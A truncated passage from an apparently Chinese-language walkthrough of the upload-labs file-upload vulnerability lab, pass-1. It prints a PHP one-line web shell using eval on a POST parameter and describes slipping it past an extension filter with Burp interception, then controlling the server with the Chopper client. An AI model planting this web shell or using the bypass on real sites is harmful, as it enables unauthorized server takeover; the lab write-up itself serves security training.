upload-labs上傳漏洞靶場--pass1,2,11,12,17

upload-labs上傳漏洞靶場 1、pass-1改變文件後綴名 新建一句話木馬文件:<?php @eval($_POST['x']);?>,並上傳。 發現.php文件上傳失敗,只能使用圖片上傳 我們修改.php文件的後綴名爲.jpg上傳,並使用burp抓包 將.jpg修改成.php後,關閉攔截,發送成功 這時,我們複製圖片地址,打開菜刀,新建項目 填寫相應信息 成功進入對方電腦 2、pass-
相關文章
相關標籤/搜索